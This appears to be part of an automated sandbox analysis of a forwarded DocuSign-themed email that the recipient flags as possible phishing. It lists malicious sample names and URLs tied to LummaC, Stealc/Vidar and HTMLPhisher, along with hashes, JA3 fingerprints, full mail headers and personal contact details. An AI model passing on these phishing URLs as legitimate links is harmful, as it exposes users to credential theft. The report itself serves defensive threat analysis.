	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	162.159.140.237
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse	104.18.24.210
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.21.33.160
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	162.159.140.237
	https://hhicorporation.start.page/	Get hash	malicious	Unknown	Browse	104.18.24.210
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.21.33.160
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://gthr.uk/e8c3	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	20241029_163818.jpg	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	https://get.hidrive.com/api/ZVDVVnH5/file/fgWacQquUMk6LQc3wqBJEz	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	https://forms.office.com/Pages/ShareFormPage.aspx?id=w0PqEzPG80GlVpQ2KYlCgotli86l81ZCgGQV0R07kYhUMDlNVzY4TDhNS0pGV0pGVENBVVNGTURFTi4u&sharetoken=3AKcsZjmxuGhgr7rDwU0	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	https://deedayoshayoatmetoback.me/whatever/toni/kross/hala/mbappe/sanchez/mark/tremble/awee/rgguuu/us/invite/	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	Jmaman_##Salary##_Benefit_for_JmamanID#IyNURVhUTlVNUkFORE9NMTAjIw==.html	Get hash	malicious	HTMLPhisher	Browse	20.109.210.53 4.245.163.56 40.126.32.134
	https://qH.todentu.ru/FcZpLy/#Obritchie@initusa.com	Get hash	malicious	Unknown	Browse	20.109.210.53 4.245.163.56 40.126.32.134

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
File Type:	data
Category:	dropped
Size (bytes):	231348
Entropy (8bit):	4.383330545737578
Encrypted:	false
SSDEEP:	1536:VrYLHQgsS2FwMAh69gsxNNcAz79ysQqt2SQK/qoQEKrcm0Fv2qLy/wPyMppY3g/k:+wgrLOgAmiGu2kqoQprt0Fv6MvKGQ+jU
MD5:	CA913BD30EAD0E1ED8101A2EDCA269AA
SHA1:	DEB0964ED66B79A60124E5FA6CB40369D509AABA
SHA-256:	4D23F5D4BEF13281637232F76123A084ECFA4ACCAD14BFF7FB8593E2B0176E37
SHA-512:	94A9F1C6A8F5C876F441579EA5FA84F271D86637F2487216D424721E616638F96E619191BE3B3B97E3A8B8FBC1088CAA1314631B4376651685694664160B7BEA
Malicious:	false
Reputation:	low
Preview:	TH02...... ....5......SM01X...,....!.5..........IPM.Activity...........h...............h............H..h..U.......qq...h.........X..H..h\cal ...pDat...h.8..0.....U....ho.............h........_`Pk...h...@...I.lw...h....H...8.Uk...0....T...............d.........2h...............k..............!h.............. h..........U...#h....8.........$h.X......8....."h........`.....'h..j...........1ho..<.........0h....4....Uk../h....h.....UkH..h....p.....U...-h .......D.U...+h.........U......... ...... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000....Microsoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 16:45:10 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9924941512583922
Encrypted:	false
SSDEEP:	48:83dEToEAH7idAKZdA1FehwiZUklqehay+3:8mf4dy
MD5:	76EE3B4F46FA35E262F03C9DA7D362BC
SHA1:	2AD4BC3EE20B52BA232D7F90C03C84D796CA2202
SHA-256:	9E46D12007839E4CC0258080E3EEE007360D2D2A47783829D24A843CB2FD6235
SHA-512:	2AD3806F41CFD17EC810DFF85007DAE9E5F8885D8D578DCAE49CB3B300F9E082DD53894B60E8CF2E9CB35F08B7719BE42AB5E1D657FF620F2E7E25CDFBB195EE
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......L*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............wM.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	RFC 822 mail, ASCII text, with very long lines (347), with CRLF line terminators
Entropy (8bit):	6.077106127622453
TrID:	E-Mail message (Var. 5) (54515/1) 100.00%
File name:	FW Complete with Docusign Remittance Advice .pdf.eml
File size:	56'457 bytes
MD5:	dc34a3c1973f12dade5f299f93b62106
SHA1:	b091c4899cea2ef9e68a07549d55146d82509f15
SHA256:	14b797c738565070487e010d986b2d8767cb60cf57d0fc47bc9efdaeaf649c1b
SHA512:	bd746db90080502b2808441d53cb3b0c020a19fbc3dc01e6820ed501005a6980d496ed8b07b26ec2ada508a6f9de981247d227035cf165732dca98dcd98d3494
SSDEEP:	1536:XNXnx2/EOPPmWx5xFq8pROX0FXZvg6G3ULLUPEangxsOYp6:X1x2JP1xFxZm3UB/
TLSH:	5643AE4049972AB1EA9008997C5EBF0720B07E8B70F75080B93DCBB7559B5F91DE26CD
File Content Preview:	Received: from SJ0PR10MB5833.namprd10.prod.outlook.com (2603:10b6:a03:3ed::22).. by PH7PR10MB7782.namprd10.prod.outlook.com with HTTPS; Tue, 29 Oct 2024.. 17:10:57 +0000..ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;.. b=nNVBd

Subject:	FW: Complete with Docusign: Remittance Advice .pdf
From:	Mike Knott <mknott@phoenixcrane.com>
To:	MSP IT Partners Support <support@msp-partner.com>
Cc:
BCC:
Date:	Tue, 29 Oct 2024 17:10:45 +0000
Communications:	I am thinking this is a phishing attempt. [cid:image001.png@01DB2A03.F6182E90] Mike Knott President c 770-876-0722 o 404-696-1522 e mknott@phoenixcrane.com<mailto:mknott@phoenixcrane.com> From: DocuSign EU System <dse@eumail.docusign.net> Sent: Tuesday, October 29, 2024 12:39 PM To: Mike Knott <mknott@phoenixcrane.com> Subject: Complete with Docusign: Remittance Advice .pdf You don't often get email from dse@eumail.docusign.net<mailto:dse@eumail.docusign.net>. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification> [DocuSign] [https://eu.docusign.net/member/Images/email/docInvite-white.png] Keitner Haydon sent you a document to review and sign. REVIEW DOCUMENT <https://eu.docusign.net/Signing/EmailStart.aspx?a=9eb1232d-b669-47cc-b565-df3c91f4d5f7&etti=24&acct=abba683f-186c-4f9e-8ab2-ac0f68fbe569&er=ad16d7d0-2faa-44b9-8c84-a75ce167beb2> Keitner Haydon hkeitner@nixcnpeabody.com<mailto:hkeitner@nixcnpeabody.com> mknott@phoenixcrane.com<mailto:mknott@phoenixcrane.com>, Complete with Docusign: Remittance Advice .pdf Thank You, Keitner Haydon Do Not Share This Email This email contains a secure link to Docusign. Please do not share this email, link, or access code with others. Alternate Signing Method Visit Docusign.com, click 'Access Documents', and enter the security code: 9EB1232DB66947CCB565DF3C91F4D5F74 About Docusign Sign documents electronically in just minutes. It's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go -- or even across the globe -- Docusign provides a professional trusted solution for Digital Transaction Management. Questions about the Document? If you need to modify the document or have questions about the details in the document, please reach out to the sender by emailing them directly. Stop receiving this email Report this email<https://protect.docusign.net/report-abuse?e=AUtomjpFak9GlbPL0zFFi11QWZPQRVAXy0-T2ps_NbUh_ZoXBfZPath_NK00h5Ple8MYb4gIdf4Ui7XxhVqPCGxwMSlBl0a_sYle6B9VYLinjRX2L5KYveSItniVxPw9lQb9T51kVEhsi3cOGHocvDbP4GB5ppnqDNuS-KSW2KNWMZHaTrSIXz_SS_bAN-JGqd14ZpLld5zOLXK_OCLMNbBjGYukD-L1PAHo8djZCY00NgQ5lstDQ-v1sbbosBFj1YsBGaD6wN0p600qh-d1iiu5kzYxSVaZBzuQ7t0SUkqkpL3TaT7owfsb9optpVegE1J7pxtfTn7S7HtTpc77mMIRLg4q1nqBa0hP24qKw51jM0nCkTj3NRnIc8y4L_s3gy9BrgvYxL4Oc623sHvkAaZ0r6M7NjABtNSIIEXW7dWH8-FZSpNA70SxxoB3s82dcw&lang=en> or read more about Declining to sign<https://support.docusign.com/en/guides/Declining-to-sign-DocuSign-Signer-Guide> and Managing notifications<https://support.docusign.com/en/articles/How-do-I-manage-my-email-notifications>. If you have trouble signing, visit "How to Sign a Document<https://support.docusign.com/s/articles/How-do-I-sign-a-DocuSign-document-Basic-Signing?language=en_US&utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificationEmailFooter&utm_medium=product&utm_source=postsend>" on our Docusign Support Center<https://support.docusign.com/>, or browse our Docusign Community<https://community.docusign.com/esignature-111?utm_campaign=GBL_US_PRD_AWA_2405_CommunityCTA&utm_medium=email&utm_source=postsend> for more information. [https://docucdn-a.akamaihd.net/olive/images/2.62.0/global-assets/email-templates/icon-download-app.png]Download the Docusign App <https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificationEmailFooter&utm_medium=product&utm_source=postsend> This message was sent to you by Keitner Haydon who is using the Docusign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.
Attachments:	image001.png

Key	Value
Received	from BN6PR13MB2930.namprd13.prod.outlook.com ([fe80::f6ec:c7e4:970:1208]) by BN6PR13MB2930.namprd13.prod.outlook.com ([fe80::f6ec:c7e4:970:1208%5]) with mapi id 15.20.8026.020; Tue, 29 Oct 2024 17:10:45 +0000
ARC-Seal	i=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=jXuVSY7sjNhp7JR7TUcyGqeSMmb3kWOnvcmKPGHPPwKmDT3eNuN8yTTXL9EWALBh5a2FH9rSHlWkdt8bde7PmOg09kMgCSX+SxCbIGGrf14jOCIyesMDPvy0uh0S4IasJz8GeJA1OAhSJVhd3Op5iHWbLLxjWT2Q8/ux8jPq5L3/79KPc92u9PNzUcyW+QwAL2yLDT+rpX2n48i874RwWT3vgaIC00kZvGd5wJA+wl8Ydp+y7ndxUTh/GLsp8hfWTEGQLlE+1kqV9xdAyvn6TwxWf0ytgKu74ZTgUnzC9v36T2fybXONsCqaGXm9l2SeTw0ILmcRwTx1zdkBxg8dsg==
ARC-Message-Signature	i=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=sA4UxejM9OAUqU1Oe7+4rRM241LNAa9pFuPAepW3hF4=; b=imYdIiyBmKUHzJaHzqgfQIX8doENso1EqGgHEooq4rNMu/RT9oQihfzTUz8oOhcT863vP1j42KYKgi1Sptb/BWa1lGkK45DWYMkYeMdckdwCdYwEcjdA84ZjDPWy5kEZe2e0DJMegL1q/cj/Ydg7fMzGzWZ9TNoRJVMGjZIg+L0hjGeHqX6Wfb6mh7VLkjWhsnD4o4UPvoHnQUFPjntey8A1GcHcrEVb3UwMejijj88tjajZmsBFqtJD6sUbLyNQXlSN1CassnWyC0T0T60o9MTWj9wO/FrnBYNVjJKcTcpVt6UUtY6jFv3Y+D4qqYwM9i82td+w+epH2+f8MriawQ==
ARC-Authentication-Results	i=1; mx.microsoft.com 1; spf=pass smtp.mailfrom=phoenixcrane.com; dmarc=pass action=none header.from=phoenixcrane.com; dkim=pass header.d=phoenixcrane.com; arc=none
Authentication-Results	spf=pass (sender IP is 40.107.243.95) smtp.mailfrom=phoenixcrane.com; dkim=pass (signature was verified) header.d=phoenixcrane.com;dmarc=bestguesspass action=none header.from=phoenixcrane.com;compauth=pass reason=109
Received-SPF	Pass (protection.outlook.com: domain of phoenixcrane.com designates 40.107.243.95 as permitted sender) receiver=protection.outlook.com; client-ip=40.107.243.95; helo=NAM12-DM6-obe.outbound.protection.outlook.com; pr=C
DKIM-Signature	v=1; a=rsa-sha256; c=relaxed/relaxed; d=phoenixcrane.com; s=selector2; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=sA4UxejM9OAUqU1Oe7+4rRM241LNAa9pFuPAepW3hF4=; b=lGH1LBTMOobq33/P+U3VV/Mg0bQTokPfntuE/G4/HzV+FnZfcW1JG27MfUcFPv8C3CAnRDQq7VjQhXYUPu5FQBotyLaEMX9+k+tgBSTLIlF2kwvug+YLEDPkH4NWQayObs4eSw15vtzAWDTEBG7yLXGiOIfgNyN+vKiOyICIuL0=
From	Mike Knott <mknott@phoenixcrane.com>
To	MSP IT Partners Support <support@msp-partner.com>
Subject	FW: Complete with Docusign: Remittance Advice .pdf
Thread-Topic	Complete with Docusign: Remittance Advice .pdf
Thread-Index	AQHbKiEW6LUCanbltE27ibYfsYLe17Kd9qIA
Date	Tue, 29 Oct 2024 17:10:45 +0000
Message-ID	<BN6PR13MB2930C0A43D90D81C59C55566A44B2@BN6PR13MB2930.namprd13.prod.outlook.com>
References	<3ab4aedfdfcc42be8fef35ac52825025@eumail.docusign.net>
In-Reply-To	<3ab4aedfdfcc42be8fef35ac52825025@eumail.docusign.net>
Accept-Language	en-US
Content-Language	en-US
X-MS-Has-Attach	yes
X-MS-TNEF-Correlator
Authentication-Results-Original	dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=phoenixcrane.com;
x-ms-traffictypediagnostic	BN6PR13MB2930:EE_\|SJ2PR13MB6118:EE_\|SJ1PEPF00001CE7:EE_\|SJ0PR10MB5833:EE_\|PH7PR10MB7782:EE_
X-MS-Office365-Filtering-Correlation-Id	46f76c39-389e-481c-f5f0-08dcf83ca316
x-ld-processed	0afd583a-94e7-46fc-9146-b0566f9b6e2e,ExtAddr
x-ms-exchange-senderadcheck	1
x-ms-exchange-antispam-relay	0
X-Microsoft-Antispam-Untrusted	BCL:0;ARA:13230040\|1800799024\|69100299015\|376014\|366016\|8096899003\|38070700018;
X-Microsoft-Antispam-Message-Info-Original	CLzdp/g0TN/KW2IwH6kCQxIiVNrgCC8k/eY2HMWLj1zpbSpyMByIZfiNfMo/hb3AjHcDzPnW2fS0vLF3V9IC01L7DFwYP0wiWNWi52Rm3YVsfVv1pqA2SvkpvEYDCvn6OtjGmHh916RqpSilAPzDlz5hk7OD3KT+GDg+tj0b2q0fgXVmXEzMdQEl+9m2MR6RoAtjfHVIDJnClgma1WV6SchDEP3qB3LANJ0E1u3XRCh2mKeXu/+TrXzNNnS46AzJqKNxtY7WS/MuxH6QFwNsAVKVJMXZUVLQZtliwpTf3O0TsmnrSJM9FgeL0iu2f9kdgdSlM9hPlE6gf4OwD1P0nA/2V8DFpeIMr85F9Z92NSBnNK6A8kAHVN5+Nv/ecfxiHNCpyxtP0EWcwOw5EltOqZfPmQbZIDQShen9O3QU6kBhrFOylvwPmGXPbm69QCfT0w2BqdenEd8ftb1I3S6c/a4CWrxqMJlI5csAamyL1TeeSjRMcT2GbeA4wbF9m5YOeF7663X+Q2guyOHJw+5QZMyhwjPy0k7NQYUdhmDlNnV9ysvoAEkkE6XBQ5BVAjtPqzWu5mOeN2xseKJEHBGYH9cfCmKhq8l9rH5wHEKZoMxW9c3cgswE017pTYksrJBP53ff3ykJK96iipXT7jahw52AF7G+5sMEjAxKA6KQUwlQjLZg1ND/UroH2xhXkRpn717aHSOX7Q+f7rBH9+qmK7zLxGdXk5cLf5WB1TqKuLcsTV8YXrmAOk/Qaoo/EPBR/5wZbbLq4TirszTlK+SEn96Qv+9U61rejqhmrdPFW+iW8yyR3ycDXlyX8T2et8lLXHTN39dV1D+ES+ZKalbXiZLuCyDKQ2tbh6WZzxso2bYP3yWBpdbTAdZgKX6md3HYH1zCZhs756xnylLgUK0/ddSVo8tE9vUk51FJpa1INzUss8X0wiWnjT9ZVcgYwN6lAE36sv0AT8mQ0EcbMRJARblCS6wXy29GDi7xaQCY05au6HKozp7OiCK8sYFdr7q0K71YCzqYYbHoNfKES0llT1H+Y/m+lWjc7g/hvLncl6XdD1etnfOcPVrHCYeSJ1MSKe/wsNUzT395VfNOZrMrrWkF0/S2sWzfN/J1imPPLvSn5U1LhhI4N83kl8mVn9Wu0NYA4AqZGP8zlYXsp2/yOFPUFF2cWQWWjuRPKAEOJYYgcVUyFFXg854QB7yiuRpDcL2LGWe15o2hr3fCTCDHU7gJzuVzG+w9gGg3Tp5r2K2er/xnLvP4o7RILXkbzX7RcwSY9U4qhnZHwRXXFXTUScRlISvvJlz7yC/kTAByzsSygfDDeb2YSzj12E8awXWN
X-Forefront-Antispam-Report-Untrusted	CIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:BN6PR13MB2930.namprd13.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(1800799024)(69100299015)(376014)(366016)(8096899003)(38070700018);DIR:OUT;SFP:1102;
X-MS-Exchange-AntiSpam-MessageData-Original-ChunkCount	1
X-MS-Exchange-AntiSpam-MessageData-Original-0	paFlHjJzhet56hNjJ+x/R1eJA5F9TPSwkh/V9qvQtINWnonQ8OIA3O8q8TtWi1RHtoSsF62u68w1mHW33Au8dXwUqe9BmCi1YsCtIgyr+iVtDpZnpH/DvD+4NyxWoun8stn0vPzvucZzuACtQkEhzqusGoUlWv0zC4X3XzAz5HTHjD9+rM1ZGVotlaxwZgU9xZSsWKcnoh8rkmKfj1q3QWMC4TpnVUWX9o47JCyZ6AeUrc97cTJjQRhyiFbGie/rJIs6XaskSDWSkjHykUraPofd8s6MoEuocxmTlsi0SPivr8YceI16cZk66PQ+PikjuGoVgxQtqHFWYaikkAnFC/4Ueg/o0CttGyRd0N0w6lcRIYrDpAUXrBY/SImawF5qZfg+625CW6pLRToCTNzKmdnug0OmoUNInV34Qs1ulWUHH+iUq20UNzyutGxXpysBAUEgtvgKFhMztKJmWZPwDkv8/j4MZV5QnLHouKgmSQDRgcVpSziQa2O+nNoMV7VcTMLPjj6T9k66NSTWQEYehfuYN4ECbEqC2xQQCpOxotOttlbLzV8dGIlwUx8dTiVnfIz5/GU55yog9wmckmq51x6mMnxAXaEiz1RFkN3dsXx+XP1JlwWKLTkx7vUn1k6oajsIKnThbDKLeykAzOf8UvV6kBB7olceB1Gy6osopFAo+tuEzRQmVtATLDykgtsylpbBFfK2/PrwLSFyvImumonprPs3PI/X5YMhPCju5a/Gj6PtmfsaR2q75/jw8gdpA/4YbU0mHM5mHqym/ZZsFeewAfTSsHRqLbakYbQiDk91x1522AMu8Ea+zWRLMiQN0b7bV58s8I1Zo0A9LBpFpulEeDvQOZ+8vZAMuJj/dx2+MwH0zYDMeoZUo5x29Kh62ilQ9DOeT6ZXkQjF5TaTC5C9A0OoK/IEDncdSq7r5obBJ9RfXgK/pmpArglnWjlO5RPIpKTK7RCsVKREhTfQMA7b0Ud4LRdo+sI9iEmiCVkxI1sLwva/TBGAq7jdvCdOkgLVA6YnAZGc7YGM0UwwzIrsfjzo5U21IAmKwSa+plrPGLyvD3fyXmA6QjLxX8QwjHcyaF4J3+hxdat60qmb7ktfBwzLut5Z8aM3OfnzH1lUNi2qu/Na7o8a9ajXINVdidHzrDiCsePjSDLtQgIdIHjLUUZUEWEeoOc4C0UR7ilgtXvqTyd9ZhdzhjhfH219bRBTPlYbjwDQsYqtXLG8RJZAP29yPEA63ysQfgNaaejaYrCPJshSBbuGS77WUPcAfXUwug5C6Mos+7XEy0EUaTMp62As1J5eA4NJAJr1hoc6zKZYyBG60wY/KvuYj6iZ92vclUB8LzBBiXW2U+a+k9nD28yZIF4n29EBDrKnT5fAby0k+ZZmqEK9WWy25ItrDhzAxSGVI72vcv9GF3pTCydDadEt78K5d+orsfY6J9qOxry225jCY4WCAClyCBY5NFyN8EBWm7fdecG/9bPh9In8i7PNqNaJHEMqed69vv4esu9av8KYGQBpg+SlZWe+jatbIIurx1n51xQmmXt5E8EDyE4hf0UHUtW/+zcXqX+tqtxhwG5uKcCaaY0aQbfJ
Content-Type	multipart/related; boundary="_004_BN6PR13MB2930C0A43D90D81C59C55566A44B2BN6PR13MB2930namp_"; type="multipart/alternative"
X-MS-Exchange-Transport-CrossTenantHeadersStamped	SJ0PR10MB5833
Return-Path	mknott@phoenixcrane.com
X-MS-Exchange-Organization-ExpirationStartTime	29 Oct 2024 17:10:49.7684 (UTC)
X-MS-Exchange-Organization-ExpirationStartTimeReason	OriginalSubmit
X-MS-Exchange-Organization-ExpirationInterval	1:00:00:00.0000000
X-MS-Exchange-Organization-ExpirationIntervalReason	OriginalSubmit
X-MS-Exchange-Organization-Network-Message-Id	46f76c39-389e-481c-f5f0-08dcf83ca316
X-EOPAttributedMessage	0
X-EOPTenantAttributedMessage	87ed6401-a239-4608-8d7a-1fcadd9f945c:0
X-MS-Exchange-Organization-MessageDirectionality	Incoming
X-MS-Exchange-Transport-CrossTenantHeadersStripped	SJ1PEPF00001CE7.namprd03.prod.outlook.com
X-MS-Exchange-Transport-CrossTenantHeadersPromoted	SJ1PEPF00001CE7.namprd03.prod.outlook.com
X-MS-PublicTrafficType	Email
X-MS-Exchange-Organization-AuthSource	SJ1PEPF00001CE7.namprd03.prod.outlook.com
X-MS-Exchange-Organization-AuthAs	Anonymous
X-MS-Office365-Filtering-Correlation-Id-Prvs	8a20a9dd-0778-4939-c4bb-08dcf83ca078
X-MS-Exchange-Organization-SCL	-1
X-Microsoft-Antispam	BCL:0;ARA:13230040\|1032899013\|69100299015\|35042699022\|12012899012\|8096899003\|2066899003;
X-Forefront-Antispam-Report	CIP:40.107.243.95;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:NAM12-DM6-obe.outbound.protection.outlook.com;PTR:mail-dm6nam12on2095.outbound.protection.outlook.com;CAT:NONE;SFS:(13230040)(1032899013)(69100299015)(35042699022)(12012899012)(8096899003)(2066899003);DIR:INB;
X-MS-Exchange-CrossTenant-OriginalArrivalTime	29 Oct 2024 17:10:49.3466 (UTC)
X-MS-Exchange-CrossTenant-Network-Message-Id	46f76c39-389e-481c-f5f0-08dcf83ca316
X-MS-Exchange-CrossTenant-Id	87ed6401-a239-4608-8d7a-1fcadd9f945c
X-MS-Exchange-CrossTenant-AuthSource	SJ1PEPF00001CE7.namprd03.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs	Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader	Internet
X-MS-Exchange-Transport-EndToEndLatency	00:00:08.8114546
X-MS-Exchange-Processed-By-BccFoldering	15.20.8114.015
X-Microsoft-Antispam-Mailbox-Delivery	ucf:1;jmr:0;auth:0;dest:I;OFR:CustomRules;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
X-Microsoft-Antispam-Message-Info	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
MIME-Version	1.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 18:45:08.592252016 CET	50767	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:08.592396021 CET	59498	53	192.168.2.16	1.1.1.1
Oct 29, 2024 18:45:08.600426912 CET	53	51998	1.1.1.1	192.168.2.16
Oct 29, 2024 18:45:08.621288061 CET	53	57049	1.1.1.1	192.168.2.16
